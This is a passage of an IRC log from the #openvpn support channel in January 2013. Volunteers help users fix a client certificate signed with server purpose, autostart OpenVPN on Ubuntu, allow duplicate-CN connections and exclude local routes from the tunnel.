moment, so will leave AS for when I get a job :) 11:23 -!- u0m3 [~Radu@109.96.140.34] has quit [Read error: Connection reset by peer] 11:27 -!- u0m3 [~Radu@92.80.109.202] has joined #openvpn 11:30 -!- Valcorb [~Valcorb@199.229.249.189] has joined #openvpn 11:38 -!- Orbi [~opera@anon-184-212.vpn.ipredator.se] has quit [Quit: Orbi] 11:40 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn 11:46 -!- ryanstop [~Valcorb@94-227-38-227.access.telenet.be] has joined #openvpn 11:46 -!- ryanstop [~Valcorb@94-227-38-227.access.telenet.be] has quit [Client Quit] 11:47 -!- ryanstop [~Valcorb@94-227-38-227.access.telenet.be] has joined #openvpn 11:49 -!- irksome [~root@host-92-20-171-234.as13285.net] has left #openvpn [] 11:49 -!- Valcorb [~Valcorb@199.229.249.189] has quit [Ping timeout: 252 seconds] 11:57 -!- vpopov [~happylife@149.62.17.217] has quit [Ping timeout: 252 seconds] 12:12 -!- ryanstop [~Valcorb@94-227-38-227.access.telenet.be] has quit [] 12:12 -!- Valcorb [~Valcorb@94-227-38-227.access.telenet.be] has joined #openvpn 12:15 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 12:45 -!- emmanuelux [~emmanuelu@vpn7.freedom-ip.com] has quit [Ping timeout: 245 seconds] 12:48 -!- vpopov [~happylife@149.62.17.217] has joined #openvpn 12:51 -!- raidz_away [~raidz@openvpn/corp/admin/andrew] has quit [Ping timeout: 244 seconds] 12:53 -!- raidz_away [~raidz@raidz.im] has joined #openvpn 12:53 -!- raidz_away is now known as raidz 12:53 -!- raidz [~raidz@raidz.im] has quit [Changing host] 12:53 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn 12:53 -!- mode/#openvpn [+o raidz] by ChanServ 13:02 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn 13:03 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 13:04 -!- m0sphere [m0sphere@S01060018e78c9cff.cg.shawcable.net] has quit [] 13:48 <@krzee> !route 13:48 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide 14:02 -!- brute11k1 [~brute11k@89.249.235.57] has joined #openvpn 14:03 -!- brute11k [~brute11k@89.249.230.213] has quit [Ping timeout: 244 seconds] 14:10 -!- tyteen4a03 [T4@n218250228096.netvigator.com] has quit [Read error: Connection reset by peer] 14:12 -!- Porkepix [~Porkepix@lns-bzn-24-82-64-185-50.adsl.proxad.net] has quit [Ping timeout: 245 seconds] 14:15 -!- Porkepix [~Porkepix@lns-bzn-39-82-255-48-229.adsl.proxad.net] has joined #openvpn 14:17 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 276 seconds] 14:34 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 255 seconds] 14:37 -!- Devastator [~devas@177.18.199.61] has joined #openvpn 14:37 -!- Devastator [~devas@177.18.199.61] has quit [Read error: Connection reset by peer] 14:39 -!- Devastator [~devas@177.18.199.61] has joined #openvpn 14:39 -!- Devastator [~devas@177.18.199.61] has quit [Changing host] 14:39 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 14:40 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn 14:47 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 245 seconds] 14:50 -!- vpopov [~happylife@149.62.17.217] has quit [Ping timeout: 245 seconds] 15:09 -!- ag4ve [~ag4ve@96.26.67.194] has quit [Ping timeout: 245 seconds] 15:16 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 15:17 -!- APTX [APTX@unaffiliated/aptx] has joined #openvpn 15:20 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Read error: Operation timed out] 15:38 -!- tyteen4a03 [T4@n218250228096.netvigator.com] has joined #openvpn 15:38 -!- khem_ is now known as william_ 15:55 -!- brute11k1 [~brute11k@89.249.235.57] has quit [Quit: Leaving.] 16:04 -!- Valcorb [~Valcorb@94-227-38-227.access.telenet.be] has quit [Read error: Connection reset by peer] 16:10 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 16:27 -!- jthunder [~jthunder@174.3.126.51] has quit [Quit: jthunder] 16:44 -!- jave [~jave@h-235-102.a149.priv.bahnhof.se] has quit [Quit: ZNC - http://znc.in] 16:55 -!- k1ng [~k1ng@unaffiliated/k1ng] has quit [Remote host closed the connection] 17:05 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 276 seconds] 17:08 -!- MeanderingCode_ [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn 17:09 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Ping timeout: 244 seconds] 17:10 -!- k1ng [~k1ng@unaffiliated/k1ng] has joined #openvpn 17:12 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has quit [Ping timeout: 256 seconds] 17:16 -!- MeanderingCode_ [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Ping timeout: 255 seconds] 17:26 -!- bisko [~bisko@78-83-118-1.spectrumnet.bg] has quit [Quit: Computer has gone to sleep.] 17:34 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn 17:42 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has joined #openvpn 17:42 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has quit [Remote host closed the connection] 17:49 -!- tyteen4a03 [T4@n218250228096.netvigator.com] has quit [Read error: Connection reset by peer] 17:50 -!- tyteen4a03 [T4@n218250228096.netvigator.com] has joined #openvpn 18:14 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 18:39 -!- wh1pl4sh88 [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn 18:41 -!- hazardous [~dbn@2001:470:8932:6855:4185::fe80] has quit [Changing host] 18:41 -!- hazardous [~dbn@openvpn/user/hazardous] has joined #openvpn 18:41 -!- mode/#openvpn [+v hazardous] by ChanServ 20:26 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 21:00 -!- midkniht [~midkniht@cpe-70-112-107-27.austin.res.rr.com] has joined #openvpn 21:00 < midkniht> http://pastebin.com/4JxAykbw 21:00 < midkniht> anyone help me diagnose my cert tls issue here? 21:03 < midkniht> i used easy-rsa/2.0 to create the certs for the server and client 21:03 < midkniht> i really dont know enough to read those errors 21:09 <+pekster> Sounds like you've used the incorrect cert on one side of the connection (using a server cert as a client, or vise-versa) or possibly referenced the wrong cert as your CA in one side of the config 21:11 < midkniht> well, ok that is possible 21:12 < midkniht> when i distribute the key and crt for the client should i not include the servers ca.crt? 21:12 < midkniht> i thought i had to 21:12 <+pekster> Try increasing the verbosity to 'verb 4' and the logs may have more detail. Otherwise, send the cert the client is using over to the server and run 'openssl verify -verbose -CAfile ca.crt -purpose sslclient your_client_cert.crt' 21:13 <+pekster> midkniht: There is no such thing as the "server ca.crt." The CA is the PKI's root certificate. The CA issues *all* the certs, including that of all clients and servers 21:13 <+pekster> You need the CA cert as the reference in your --ca directive for OpenVPN, not a server or client cert 21:13 <+pekster> !pki 21:13 <@vpnHelper> "pki" is (#1) http://openvpn.net/index.php/open-source/documentation/howto.html#pki for how to make your PKI stuff (ca, and certs) or (#2) Heres a basic rundown of how it works... The server, client, and ca certs are all signed by the same ca.key. The server and client use the ca.crt to check that eachother were signed by the right ca.key. Optionally, the client also checks that the server cert was 21:13 <@vpnHelper> signed specially as a server (see !servercert) 21:14 < midkniht> ok for a client, should it not need a ca.crt specified? 21:14 <+pekster> Both sides need the ca.crt available and referenced 21:14 < midkniht> right i signed all the certs on the same machine with the ca.key 21:15 < midkniht> i used the same ca.crt on the client that i generated on the server 21:15 < midkniht> is that where i am making a mistage? 21:15 < midkniht> mistake 21:15 <+pekster> Can you restart your server with 'verb 4' and post the full portion of the certificate verification sequence? 21:16 <+pekster> That should tell in more detail what's broken 21:16 < midkniht> did that, it wasnt anything new 21:16 < midkniht> but i will 21:16 < midkniht> hold on 21:17 <+pekster> Be sure you restart the service after adding 'verb 4' to the config since it won't pick it up otherwise 21:17 < midkniht> http://pastebin.com/Stw7TTKp 21:18 < midkniht> pekster: see what im saying nothing new 21:18 <+pekster> CN=karma, is that your client? 21:18 < midkniht> \yes 21:18 < midkniht> shouldbe fqdn 21:19 < midkniht> ? 21:19 <+pekster> No, it doesn't matter, I just want to make sure that's what you're expecting as the client name (your CN can be whatever you like.) 21:20 < midkniht> karma is client, laney is server 21:20 <+pekster> Can you paste the server config? It's choking on some missing/invalid cert purpose, so the config should point to what it wants (then we'll check your client cert) 21:20 < midkniht> sure 21:20 < midkniht> http://pastebin.com/Mm4498eY 21:20 < midkniht> server conf 21:21 < midkniht> http://pastebin.com/j6xtpM0L - client conf 21:21 < midkniht> ca.crt is the same on both 21:24 <+pekster> You shouldn't have 'ns-cert-type server' in your server config. It appears to be commented out (line 18) but that directive neds to check for a client cert, not a server cert 21:24 < midkniht> so delete that commented line 21:25 < midkniht> done 21:25 <+pekster> Well, if it's commented it won't matter, (normally you *do* want to check that on both sides) but it's commented, so if it's using that config it won't matter 21:25 <+pekster> !mitm 21:25 <@vpnHelper> "mitm" is (#1) http://openvpn.net/index.php/documentation/howto.html#mitm to know about stopping Man-in-the-Middle attacks by signing the server cert specially or (#2) use !servercert to generate the server cert manually or use the easy-rsa build-key-server script to build your server certificates or (#3) then use: ns-cert-type server in the client config 21:25 < midkniht> i used easy-rsa build-key-server 21:25 <+pekster> (that's the how and the why, for a full understanding. Not really relevant right now) 21:26 < midkniht> so i dont need it on the client side either? 21:26 <+pekster> You should definiatly do server-cert verification client side 21:26 < midkniht> k 21:26 <+pekster> That link the bot pasted above explains why 21:26 < midkniht> noted 21:26 <+pekster> But, the client sin't the one spewing errors, right? 21:26 < midkniht> no 21:27 < midkniht> i could make it verbose if you like 21:27 <+pekster> Okay, let's check the client cert. Can you send the client cert to the server, and then run 'openssl verify -verbose -CAfile ca.crt -purpose sslclient karma.crt' on the server? 21:29 < midkniht> i got the same errror 21:29 < midkniht> i think we are on to something now 21:29 <+pekster> And nothing more verbose? :\ 21:29 < midkniht> root@laney:/etc/openvpn# openssl verify -verbose -CAfile ca.crt -purpose sslclient easy-rsa/2.0/keys/karma.crt 21:29 < midkniht> easy-rsa/2.0/keys/karma.crt: /C=US/ST=TX/L=Austin/O=Administr8/Duuit!/CN=karma/emailAddress=support@administr8.me 21:29 < midkniht> error 26 at 0 depth lookup:unsupported certificate purpose 21:29 < midkniht> OK 21:29 <+pekster> Hmm 21:29 <+pekster> Allright, pastebin 'openssl x509 -in karma.crt -noout -text' 21:29 <+pekster> Let's see what's up with that cert 21:30 < midkniht> http://pastebin.com/sBnvcH1f 21:31 <+pekster> That cert is signed as a server, not a client (line 41 on that output) 21:31 <+pekster> Further, it's usually a really bad idea to use special symbols like slashes and puncuation in your CN field 21:34 < midkniht> recreating 21:34 < EugeneKay> It's allowed, just stupid. 21:34 <+pekster> Yea. I didn't say invalid, just bad idea (it'll cause you all sorts of headaches down the road, like if you use the CN to do per-client rules or ccd's) 21:35 <+pekster> Plus it'll make poorly-written shell scripts do unexpected things ;) 21:35 <+pekster> You'd need to re-create the entire PKI to fix that midkniht, since your CA has symbols in its CN too 21:35 < midkniht> how to clear the db? 21:36 <+pekster> Plus the Org field 21:36 < midkniht> i edited vars to fix it 21:36 < midkniht> but i want to erase the store 21:36 < midkniht> rm keys/* 21:36 < midkniht> ? 21:36 <+pekster> The clean-all will clear the entire PKI 21:37 <+pekster> Run that script and it'll give you a "fresh" PKI by removing everything you've set up thus far 21:37 < midkniht> perfect 21:37 < midkniht> thanks 21:37 <+pekster> And if you've messed with openssl.cnf at all be sure you return it to a stock setup 21:38 <+pekster> The important thing is to get the client cert generated with client values, not server ones (ie: don't use build-key-server for your client) 21:38 <+pekster> Somehow that's what you did last time 21:42 < midkniht> that did 21:42 < midkniht> it 21:42 < midkniht> thanks pekster 21:42 < midkniht> i send you virtual cookies and tacos 21:43 <+pekster> A virtual beer would be better (I just finished my last real-world one...) 21:43 * midkniht beers pekster 21:43 <+pekster> I guess there's always the Canadian Whiskey on the shelf...) 22:18 -!- b1rkh0ff [~b1rkh0ff@109.163.163.189] has quit [Ping timeout: 245 seconds] 22:19 -!- b1rkh0ff [~b1rkh0ff@31.176.186.83] has joined #openvpn 22:34 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has quit [Quit: Leaving] 22:39 -!- MeanderingCode_ [~Meanderin@71-213-188-66.albq.qwest.net] has joined #openvpn 22:42 -!- MeanderingCode [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Read error: Operation timed out] 23:31 -!- bisko [~bisko@78-83-118-1.spectrumnet.bg] has joined #openvpn 23:47 -!- Cpt-Oblivious is now known as FemaleVaccumStal 23:47 -!- FemaleVaccumStal is now known as Cpt-Oblivious --- Day changed Mon Jan 28 2013 00:01 -!- osirisx11 [~osiris@93.114.44.253] has joined #openvpn 00:01 < osirisx11> hi all, how can i start an openvpn connection after my wifi connects? 00:02 < osirisx11> (automatically) 00:03 <+pekster> By running the openvpn command from whatever facility your OS provides for post-connection process execution when the interface is up 00:10 <@krzee> by leaving it running all the time and just letting it connect when you get online 00:11 <@krzee> unless you mean you ONLY want it on wifi, as opposed to via ethernet 00:12 < ngharo> how do ya'll manage multiple tunnels? i just throw my configs in and let the init script start em all 00:12 <@krzee> depends on the os 00:13 < ngharo> but been thinking of a way to turn off individual tunnels on demand 00:13 <+pekster> My disto of choice (gentoo) already does that in its initscripts 00:13 < ngharo> right now i just kill pid manually 00:13 <@krzee> !management 00:13 <@vpnHelper> "management" is (#1) see http://openvpn.net/management for doc on management interface or (#2) read http://svn.openvpn.net/projects/openvpn/obsolete/BETA21-preauto/openvpn/management/management-notes.txt if you are a programmer making a GUI that will interact with OpenVPN 00:13 <+pekster> You just symlink openvpn.name -> openvpn and the initscript figures out what config you want from the .name portion 00:14 <+pekster> ngharo: Check out Gentoo's initscripts if you want some ideas on how to extend that to your OS. I did something similar for the OpenWRT platform based on symlinks and bash scripting 00:14 < ngharo> will do 00:14 <+pekster> It's actaully really simple once you understand how it works 00:14 < osirisx11> krzee: thanks i like your idea i would love for it to stalk my connection and autoconnect anytime i go online anywhere, how can i do this? (ubuntu) 00:14 <@krzee> depending on your needs you could do anything from use the built in os commands for starting / stopping daemons, to building your own command center in your fav language that intercts with management interface 00:14 <+pekster> I have no clue why this isn't the default way to do things on other distros 00:15 < ngharo> pekster: can you give me an example on usage? do you `/etc/init.d/openvpn start foobar' 00:15 <+pekster> ngharo: /etc/init.d/openvpn.config1 start 00:15 <@krzee> osirisx11, its more or less normal, just make sure your configs are set with a keepalive, retry forever, maybe some persist options 00:15 <@krzee> !confgen 00:15 <@vpnHelper> "confgen" is (#1) http://www.doeshosting.com/code/openvpn-confgen.tgz for the bash config generator or (#2) you can use svn co http://www.secure-computing.net/svn/trunk/openvpn-confgen/ or (#3) you must run this in bash 00:15 < ngharo> ohh, pekster gotcha. 00:15 <+pekster> /etc/init.d/openvpn.config1 is just a symlink to /etc/init.d/openvpn 00:15 <@krzee> osirisx11, the configs from that should be fine ^ 00:15 <@krzee> osirisx11, or !sample 00:15 < ngharo> ringing some bells back from my gentoo days. net.eth0, net.eth1... etc scripts 00:15 <+pekster> ngharo: Obviously the bash in the initscript is smart enough to parse out the "config1" part of that (ie: everything after the "openvpn." part and treat it as a config file 00:15 < ngharo> pekster: thanks 00:16 <+pekster> If you're a competient scripter, it should be trivial to design that same thing for your platform. If you need some hints, just go to gentoo's svn sources and see what they've done 00:16 <@krzee> pekster, that is similar to the freebsd way, you cp the script with .name and then configure it in rc.conf 00:17 <+pekster> IIRC, something like ${0#*.} is a good place to start tinkering 00:17 <+pekster> krzee: Yes, netbsd/fbsd does things similar to gentoo. This is why I prefer gentoo over most other lsb/sysV-based crap distros ;) 00:17 <+pekster> It's much more "sane" :P 00:17 <@krzee> ++ 00:17 <+pekster> Although, they lack support to interact with just one instance/pid 00:18 <@krzee> who does? 00:18 < osirisx11> krzee: sorry what is !sample? 00:18 <+pekster> NetBSD does, at least. You can set the configs you want to start in rc.conf, but you *can't* tell the initsscript to stop or HUP one, for instance 00:18 <+pekster> That's a PITA when you need to restart just a single instance, or stop it then start it later after you do something else 00:19 <@krzee> /usr/local/etc/rc.d/openvpn.name {start,stop,restart,etc} 00:19 <+pekster> Hmm, that wasn't how netbsd did it, at least in the version we used at the time last job 00:19 <@krzee> osirisx11, 00:19 <@krzee> !sample 00:19 <@vpnHelper> "sample" is (#1) http://www.ircpimps.org/openvpn.configs for a working sample config or (#2) DO NOT use these configs until you understand the commands in them, read up on each first column of the configs in the manpage (see !man) or (#3) these configs are for a basic multi-user vpn, which you can then build upon to add lans or internet redirecting 00:20 * krzee pets vpnHelper 00:20 <+pekster> NetBSD just used the '$openvpn' (or something like that) variable from rc.conf to pass to a loop and blindly started them all 00:20 < osirisx11> what do i do with that config? 00:20 <+pekster> If one died, or you wanted to stop just one, you had to hunt the pidfile down and interact with it yourself :( 00:20 < osirisx11> i already have a working openvpn config 00:20 <@krzee> havnt used netbsd 00:21 <@krzee> osirisx11, how are you starting openvpn now? 00:21 < osirisx11> nm-applet 00:21 <@krzee> oh i see 00:21 <@krzee> !ubuntu 00:21 <@vpnHelper> "ubuntu" is dont use network manager! 00:21 <@krzee> !netman 00:21 <@vpnHelper> "netman" is if you are using network manager for linux to configure your vpn, dont! http://openvpn.net/archive/openvpn-users/2008-01/msg00046.html to read the same thing from the author of the openvpn 2 cookbook on the mail list 00:21 <@krzee> =] 00:22 <@krzee> put your working config in /etc/openvpn 00:22 <@krzee> with .conf as the file extension 00:22 <@krzee> (ubuntu's openvpn init script starts all openvpn instances) 00:22 < osirisx11> i have an ovpn 00:22 < osirisx11> and keys 00:22 <@krzee> rename ovpn to conf 00:22 < osirisx11> ovpn file extension file i mean 00:23 < osirisx11> yea? why the diff file extension in the first place? 00:23 < osirisx11> are they 1:1? 00:23 <@krzee> openvpn doesnt care, only the init script does 00:23 <@krzee> windows likes .ovpn 00:23 < osirisx11> lol windows 00:23 <@krzee> in reality, its just a text file either way 00:23 < osirisx11> sure 00:23 <+pekster> ngharo: Here's a quick-start guide to hacking your own (superior) init script: use the output of ${0#*.} to strip out the leading "*." of the called command. eg: /etc/init.d/openvpn.sample would set that bash sequence I used earlier to "sample" 00:23 < osirisx11> ok so i rename it then i put it in.. /etc/openvpn 00:23 < osirisx11> then what? 00:24 < osirisx11> thx krzee 00:24 <@krzee> tell your OS to run openvpn on boot 00:24 <@krzee> i dont run ubuntu 00:24 <+pekster> man upstart, perhaps? 00:24 -!- EugeneKay [eugene@itvends.com] has quit [Quit: ZNC - http://znc.in] 00:25 <@krzee> update-rc.d openvpn enable 2345 00:25 -!- EugeneKay [eugene@selfloath.in] has joined #openvpn 00:25 <@krzee> http://ubuntuforums.org/showthread.php?t=1609579 00:25 <@vpnHelper> Title: [ubuntu] How to autostart Openvpn server at boot ? - Ubuntu Forums (at ubuntuforums.org) 00:25 <+pekster> Every time I have to do something under Ubuntu that's trivial in Gentoo, I end up ripping my hair out ;) 00:33 < osirisx11> thanks krzee 00:34 <@krzee> np 00:34 < osirisx11> krzee: will this update nm-applet to show vpn encrypted icon? 00:35 <@krzee> doubt it 00:35 <@krzee> !netman 00:35 <@krzee> :-p 00:35 <@vpnHelper> "netman" is if you are using network manager for linux to configure your vpn, dont! http://openvpn.net/archive/openvpn-users/2008-01/msg00046.html to read the same thing from the author of the openvpn 2 cookbook on the mail list 00:35 < osirisx11> he just said it sucked. this is not constructive 00:35 < osirisx11> what do you use to see current network status? 00:35 < osirisx11> is there a better gnome panel? 00:36 <@krzee> use netman for that, but not for your vpn 00:36 <@krzee> let openvpn run as a service 00:42 < osirisx11> ok 00:42 < osirisx11> can i have the conf be a symlink? 00:42 < osirisx11> to a portable drive 00:43 < osirisx11> i want to boot, mount drive, wait for internet and connect ovpn, 00:51 -!- osirisx11 [~osiris@93.114.44.253] has quit [Quit: Leaving.] 00:57 -!- Orbi [~opera@anon-184-212.vpn.ipredator.se] has joined #openvpn 01:13 -!- vilce [~vilce@vpn.classit.ro] has joined #openvpn 01:13 < vilce> !welcome 01:13 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 01:13 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 01:16 < vilce> Hi guys, can I setup simultaneous connections from the same user/pass (and give different IP addresses for each connection) ? 01:17 <+pekster> vilce: Sure, see the --duplicate-cn config option 01:18 < vilce> pekster: thank you mate. and is there also the option to specify a range like /29 too ? 01:18 <+pekster> A range for what? 01:19 < vilce> let's see I want to allow 5 IP for 5 simultaneous connections for the same user "vilce" 01:19 <+pekster> If you want to cap arbitrarily like that you'd need to write your own backend logic to do that and use a --client-connect script 01:20 <+pekster> ie: manage the pool of IPs yourself and script the assigngment to connecting peers 01:20 < vilce> but it's possible what I want right ? 01:21 <+pekster> Indeed, with some scripting you can get exactly what you want 01:22 < vilce> yep, nice, I want something like home-pc/work-pc/children-pc/wife-pc/laptop to use the same user/pass to see in the "lan" 01:23 < vilce> I will keep reading about this, thanks 01:27 -!- bisko [~bisko@78-83-118-1.spectrumnet.bg] has quit [Quit: Computer has gone to sleep.] 01:34 -!- MeanderingCode_ [~Meanderin@71-213-188-66.albq.qwest.net] has quit [Remote host closed the connection] 01:54 -!- brute11k [~brute11k@89.249.230.238] has joined #openvpn 01:54 -!- bisko [~bisko@77.70.26.115] has joined #openvpn 02:09 -!- jave [~jave@h-235-102.a149.priv.bahnhof.se] has joined #openvpn 02:18 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 255 seconds] 02:19 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 02:22 -!- midkniht [~midkniht@cpe-70-112-107-27.austin.res.rr.com] has quit [Ping timeout: 252 seconds] 02:27 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 02:30 -!- vilce [~vilce@vpn.classit.ro] has quit [] 02:31 -!- blackmagic [black@got.laid.using.blackmajic.org] has joined #openvpn 02:37 -!- EugeneKay [eugene@selfloath.in] has quit [Quit: ZNC - http://znc.in] 02:51 -!- EugeneKay [EugeneKay@selfloath.in] has joined #openvpn 02:58 -!- denon [~denon@unaffiliated/denon] has quit [Ping timeout: 245 seconds] 03:06 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 03:11 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 03:17 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 03:36 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 03:53 -!- novaflash is now known as novaflash_away 04:10 < AsadH> get your butt back here novaflash_away ! 04:22 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Read error: Operation timed out] 04:24 -!- Saviq [~Saviq@sawicz.net] has quit [Changing host] 04:24 -!- Saviq [~Saviq@canonical/saviq] has joined #openvpn 05:01 -!- Porkepix [~Porkepix@lns-bzn-39-82-255-48-229.adsl.proxad.net] has quit [Ping timeout: 252 seconds] 05:03 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn 05:16 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has joined #openvpn 05:16 -!- Porkepix [~Porkepix@lns-bzn-39-82-255-48-229.adsl.proxad.net] has joined #openvpn 05:18 -!- Mimiko [~Mimiko@77.89.245.38] has joined #openvpn 05:21 -!- Porkepix [~Porkepix@lns-bzn-39-82-255-48-229.adsl.proxad.net] has quit [Ping timeout: 252 seconds] 05:23 -!- Porkepix [~Porkepix@lns-bzn-39-82-255-48-229.adsl.proxad.net] has joined #openvpn 05:28 -!- novaflash_away is now known as novaflash 05:29 <@novaflash> yeah yeah yeah take it easy asadh 05:29 <@novaflash> i had to defeat the Ogre of Windows Update first 05:31 <+pekster> Don't feel too bad novaflash; I just had an awful time reading about this: http://www.freedesktop.org/wiki/Software/systemd/PredictableNetworkInterfaceNames 05:31 <@vpnHelper> Title: freedesktop.org - Software/systemd/PredictableNetworkInterfaceNames (at www.freedesktop.org) 05:31 <+pekster> Check out what my "new" network name would be for eth0 on this system: http://fpaste.org/Qa3N/ 05:32 <@novaflash> oh 05:32 <@novaflash> yeah 05:32 <@novaflash> predictable 05:32 <+pekster> "predictable" 05:32 <@novaflash> i wish they'd just leave it eth0! 05:32 <+pekster> My USB-adapters would be named based on where they are connected in the USB bus/hub chain :( 05:32 <@novaflash> in 90% of the cases that's the default interface name anyways 05:32 <@novaflash> haha that's going to be fun 05:33 <+pekster> So if I plug my adpater in on the opposite side of my netbook, it gets a new iface name :( 05:33 <@novaflash> so something like usb0002enp0s18 ? 05:33 < AsadH> woo! :) 05:33 < AsadH> are you still running windows update novaflash..? 05:33 < AsadH> it's been five days 05:33 <@novaflash> nah i'm done with it 05:33 <@novaflash> yup 05:33 <+pekster> novaflash: Yea, you get samples here: http://cgit.freedesktop.org/systemd/systemd/tree/src/udev/udev-builtin-net_id.c#n20 05:33 <@vpnHelper> Title: systemd/systemd - System and Session Manager (at cgit.freedesktop.org) 05:33 <@novaflash> hahaha 05:33 <+pekster> novaflash: Check out the satanic device name on line 76 on that file 05:33 <@novaflash> wwp0s29u1u4i6 05:33 <@novaflash> lol i just found it 05:33 <+pekster> Yea 05:33 <+pekster> lmao 05:34 <@novaflash> fun times 05:34 <@novaflash> nah i just had a little problem with one particular windows update that wouldn't go because i had disabled the windows firewall services 05:34 <@novaflash> of course it doesn't tell you this 05:34 <@novaflash> and just silently fails 05:40 <@novaflash> "hello i want magical solution that checks every client computer if their antivirus is up to date, without knowing what antivirus they are using, can access server do this?" .. sigh 05:43 <+pekster> novaflash: Here's your canned reply to that: http://lh3.ggpht.com/-Uv31mkKU_jk/S99BW8bsF7I/AAAAAAAAA_k/W3I8mpu5LoQ/dsl-modem-condom.jpg 05:43 <@novaflash> :-D 05:49 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has quit [Quit: Leaving] 05:50 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 255 seconds] 05:51 -!- Porkepix [~Porkepix@lns-bzn-39-82-255-48-229.adsl.proxad.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 05:55 -!- joshie [~josh@joshie.net] has quit [Ping timeout: 248 seconds] 05:55 -!- Porkepix [~Porkepix@lns-bzn-39-82-255-48-229.adsl.proxad.net] has joined #openvpn 06:01 < andi> Hi 06:02 < andi> I have an openvpn tunnel running. The client routes all the traffic through the tunnel. I'd like to add some private networks which should not be routed through the tunnel. Can somebody give me an example how to add the command "route add -net 192.168.0.0/24 gw 192.168.1.1" to openvpn client configuration? 06:08 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Read error: Operation timed out] 06:13 -!- dazo_afk is now known as dazo 06:13 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 06:14 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 06:20 <@novaflash> are you sure you want to do this by pushing a route? 06:20 <@novaflash> and not just setting these routes up locally on the client side? 06:21 <+pekster> If this is an exception for client-side networks, it would make more sense to do it in the client's ovpn config, not the client terminal (obviously if this is consistent across all your clients, it should be pushed from the serer) 06:22 <+pekster> andi: See the --route in the manpage, since you get a few variables to play with. Specifically, I think you want to use the net_gateway variable 06:22 <+pekster> Short example in openvpn config syntax: 'route 192.168.0.0 255.255.255.0 net_gateway' 06:23 <+pekster> mod to taste, and/or wrap it in a server-side push statement 06:23 <+pekster> This said, you never need to redirect your client link-local LAN since you already have a higher priority route for it 06:24 <+pekster> (if that's what you're trying to do) 06:36 -!- joshie [~josh@joshie.net] has joined #openvpn 06:47 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 06:47 < Azrael_-> hi 06:48 <@novaflash> pekster, you have a brain! awesome. 06:48 < Azrael_-> i run winxp sp2 with openvpn. but after installing openvpn the windows firewall service doesn't start any more and without it all incoming connections are blocked. how can i resolve this? 06:49 <@novaflash> xp sp2? isn't it time you updated to sp3..? 06:50 <@novaflash> and did you install openvpn 2.3 or the older 2.2.2 ? might want to give the older one a try. 06:50 < Azrael_-> sorry, my bad. it is sp3 06:51 < Azrael_-> i installed the 2.2.2 06:51 < Azrael_-> and it seems like the windows firewall has problems with the network-adapter of openvpn 06:53 < kisom> Azrael_-: Without the firewall all connections are allowed by default. 06:53 < Azrael_-> kisom: but without the windows firewall service running i can't even ping the machine. after starting the service it works again just fine 06:54 < kisom> Azrael_-: Sounds wierd, since it's the firewalls responsability to block incomming connections 06:54 < kisom> Azrael_-: Check 